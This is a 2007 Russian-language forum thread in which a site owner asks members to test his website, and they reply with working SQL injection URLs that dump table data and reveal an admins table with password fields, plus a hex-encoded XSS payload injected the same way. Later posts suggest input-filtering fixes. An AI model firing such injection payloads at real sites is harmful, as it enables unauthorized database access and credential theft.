F.i.p.

Discussion in 'Проверка на уязвимости' started by bogus92, 31 Aug 2007.

Thread Status:
Not open for further replies.
  1. bogus92

    bogus92 New Member

    Joined:
    3 Aug 2007
    Messages:
    7
    Likes Received:
    1
    Reputations:
    0
    http://fi-people.org.ua
    Сайт пока очень сырой, но уязвимости, я думаю найдуться.
     
  2. Red_Red1

    Red_Red1 Banned

    Joined:
    12 Jan 2007
    Messages:
    246
    Likes Received:
    258
    Reputations:
    83
    Вот пока найдена скуль иньекция.
    http://fi-people.org.ua/view.php?id=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13/*
    Очень мало на сайте всего, негде искать!!!

    А вот и информация через скуль
    http://fi-people.org.ua/view.php?id=-1%20union%20select%201,name,3,4,5,6,7,8,9,10,11,12,13%20from%20persons/*


    Ну блин.... только что заметил. Версия мускула 5.*.* поэтому можно увидеть инфу из всех таблиц и ничего не нужно подбирать.

    Итого: Есть 20 таблиц. Есть таблица admins (правда пока недоступна почемуто) в ней есть поля id,name,password может еще какие я не смотрел. Ну думаю этого хватит.
     
    #2 Red_Red1, 1 Sep 2007
    Last edited: 1 Sep 2007
    2 people like this.
  3. Constantine

    Constantine Elder - Старейшина

    Joined:
    24 Nov 2006
    Messages:
    798
    Likes Received:
    710
    Reputations:
    301
    SIXSS =)))

    http://fi-people.org.ua/view.php?id=-1+union+select+1,0x3c7363726970743e616c657274282778737327293c2f7363726970743e,3,4,5,6,7,8,9,10,11,12,13/*
     
    3 people like this.
  4. NOmeR1

    NOmeR1 Everybody lies

    Joined:
    2 Jun 2006
    Messages:
    1,068
    Likes Received:
    783
    Reputations:
    213
    Попробуй для устранения SQL-inj использовать
    PHP:
    $_GET['id'] = preg_replace('/[^0-9]/','',$_GET['id']);
    :) просто прикольный метод... сорри за оффтоп :)
     
    2 people like this.
  5. bogus92

    bogus92 New Member

    Joined:
    3 Aug 2007
    Messages:
    7
    Likes Received:
    1
    Reputations:
    0
    Спасибо всем, кто ответил(всем атплюсовал). А переменные я немного по-дрому фильтровал :)

    $id = urldecode(htmlspecialchars($id = $_POST['id'], ENT_QUOTES));
     
  6. bogus92

    bogus92 New Member

    Joined:
    3 Aug 2007
    Messages:
    7
    Likes Received:
    1
    Reputations:
    0
    хм... а я хоть добавил репутацию? а то у меня 0 светиться...
     
  7. bogus92

    bogus92 New Member

    Joined:
    3 Aug 2007
    Messages:
    7
    Likes Received:
    1
    Reputations:
    0
    ЗЫ. Поправил ещё кое-что. Теперь за незатверждённых людей нельзя ни голосовать ни просматривать информацию о них.
     
  8. Slon

    Slon Elder - Старейшина

    Joined:
    9 Dec 2005
    Messages:
    123
    Likes Received:
    21
    Reputations:
    3
    intval() помоему удобнее. Сорри за оффтоп)
     
Thread Status:
Not open for further replies.